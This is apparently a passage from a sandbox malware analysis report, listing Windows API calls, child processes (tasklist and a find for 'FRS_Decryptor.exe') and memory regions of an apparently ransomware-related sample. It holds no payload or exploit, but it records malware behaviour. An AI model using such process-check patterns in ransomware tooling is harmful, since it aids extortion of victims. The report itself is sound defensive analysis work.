FindClose (in: hFindFile=0x7804a0 | out: hFindFile=0x7804a0) returned 1 [0140.622] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.622] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.622] GetConsoleTitleW (in: lpConsoleTitle=0x60f77c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0140.622] InitializeProcThreadAttributeList (in: lpAttributeList=0x60f6a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x60f68c | out: lpAttributeList=0x60f6a8, lpSize=0x60f68c) returned 1 [0140.622] UpdateProcThreadAttribute (in: lpAttributeList=0x60f6a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x60f694, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x60f6a8, lpPreviousValue=0x0) returned 1 [0140.622] GetStartupInfoW (in: lpStartupInfo=0x60f6e0 | out: lpStartupInfo=0x60f6e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.622] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.623] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.623] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0140.623] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x60f630*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x60f67c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x60f67c*(hProcess=0x60, hThread=0x54, dwProcessId=0x960, dwThreadId=0x2b8)) returned 1 [0140.638] CloseHandle (hObject=0x54) returned 1 [0140.638] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0140.638] GetEnvironmentStringsW () returned 0x78ad78* [0140.639] FreeEnvironmentStringsA (penv="=") returned 1 [0140.639] DeleteProcThreadAttributeList (in: lpAttributeList=0x60f6a8 | out: lpAttributeList=0x60f6a8) [0140.639] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0140.639] _close (_FileHandle=4) returned 0 [0140.639] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0141.104] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x60f9f0 | out: lpExitCode=0x60f9f0*=0x0) returned 1 [0141.104] CloseHandle (hObject=0x64) returned 1 [0141.104] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0141.105] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x60f9f0 | out: lpExitCode=0x60f9f0*=0x0) returned 1 [0141.105] CloseHandle (hObject=0x60) returned 1 [0141.105] _get_osfhandle (_FileHandle=1) returned 0x260 [0141.105] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0141.105] _get_osfhandle (_FileHandle=1) returned 0x260 [0141.105] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0141.105] _get_osfhandle (_FileHandle=0) returned 0x24 [0141.105] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0141.105] SetConsoleInputExeNameW () returned 0x1 [0141.105] GetConsoleOutputCP () returned 0x1b5 [0141.106] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0141.106] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.106] exit (_Code=0) Process: id = "156" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x6dcb7000" os_pid = "0x8f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "155" os_parent_pid = "0x90c" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7946 start_va = 0x60000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7947 start_va = 0x80000 end_va = 0x81fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7948 start_va = 0x90000 end_va = 0x9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 7949 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 7950 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 7951 start_va = 0x100000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 7952 start_va = 0x140000 end_va = 0x143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 7953 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 7954 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 7955 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7956 start_va = 0x7e540000 end_va = 0x7e562fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e540000" filename = "" Region: id = 7957 start_va = 0x7e56a000 end_va = 0x7e56afff entry_point = 0x0 region_type = private name = "private_0x000000007e56a000" filename = "" Region: id = 7958 start_va = 0x7e56c000 end_va = 0x7e56efff entry_point = 0x0 region_type = private name = "private_0x000000007e56c000" filename = "" Region: id = 7959 start_va = 0x7e56f000 end_va = 0x7e56ffff entry_point = 0x0 region_type = private name = "private_0x000000007e56f000" filename = "" Region: id = 7960 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7961 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7962 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7963 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7965 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7966 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7967 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7968 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7987 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 7988 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7989 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 7990 start_va = 0x2e0000 end_va = 0x35dfff entry_point = 0x2e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7991 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 7992 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 7993 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 7994 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 7995 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 7996 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7997 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7998 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 7999 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 8000 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8001 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8002 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8003 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 8004 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8005 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8006 start_va = 0x7e440000 end_va = 0x7e53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e440000" filename = "" Region: id = 8011 start_va = 0x80000 end_va = 0x82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 8012 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 8013 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 8014 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 8015 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8016 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8017 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 8018 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 8019 start_va = 0x3c0000 end_va = 0x547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 8020 start_va = 0x550000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 8021 start_va = 0x6e0000 end_va = 0x1adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 8022 start_va = 0x1ae0000 end_va = 0x1c21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ae0000" filename = "" Region: id = 8023 start_va = 0x1c30000 end_va = 0x1f04fff entry_point = 0x1c30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8024 start_va = 0x1f10000 end_va = 0x230bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 8025 start_va = 0x734b0000 end_va = 0x73510fff entry_point = 0x734b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 8026 start_va = 0x73520000 end_va = 0x7352bfff entry_point = 0x73520000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 8027 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 8028 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 8029 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 8030 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 8031 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8032 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8033 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8034 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8035 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8036 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8037 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 8038 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8039 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 8040 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8041 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8042 start_va = 0x73460000 end_va = 0x734a1fff entry_point = 0x73460000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 8055 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 8056 start_va = 0x2310000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 8057 start_va = 0x2350000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 8058 start_va = 0x2390000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 8059 start_va = 0x23d0000 end_va = 0x240ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 8060 start_va = 0x2410000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 8061 start_va = 0x73410000 end_va = 0x7341ffff entry_point = 0x73410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 8062 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 8063 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 8064 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 8065 start_va = 0x7e43d000 end_va = 0x7e43ffff entry_point = 0x0 region_type = private name = "private_0x000000007e43d000" filename = "" Region: id = 8066 start_va = 0x7e564000 end_va = 0x7e566fff entry_point = 0x0 region_type = private name = "private_0x000000007e564000" filename = "" Region: id = 8067 start_va = 0x7e567000 end_va = 0x7e569fff entry_point = 0x0 region_type = private name = "private_0x000000007e567000" filename = "" Region: id = 8068 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 431 os_tid = 0x8f0 Thread: id = 433 os_tid = 0x710 Thread: id = 434 os_tid = 0x970 Thread: id = 435 os_tid = 0x1e0 Process: id = "157" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0xbd46000" os_pid = "0x960" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "155" os_parent_pid = "0x90c" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7969 start_va = 0xbb0000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 7970 start_va = 0xbd0000 end_va = 0xbd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 7971 start_va = 0xbe0000 end_va = 0xbeefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 7972 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 7973 start_va = 0xc30000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 7974 start_va = 0xc70000 end_va = 0xc73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 7975 start_va = 0xc80000 end_va = 0xc80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 7976 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 7977 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7978 start_va = 0x7ea50000 end_va = 0x7ea72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea50000" filename = "" Region: id = 7979 start_va = 0x7ea7b000 end_va = 0x7ea7dfff entry_point = 0x0 region_type = private name = "private_0x000000007ea7b000" filename = "" Region: id = 7980 start_va = 0x7ea7e000 end_va = 0x7ea7efff entry_point = 0x0 region_type = private name = "private_0x000000007ea7e000" filename = "" Region: id = 7981 start_va = 0x7ea7f000 end_va = 0x7ea7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea7f000" filename = "" Region: id = 7982 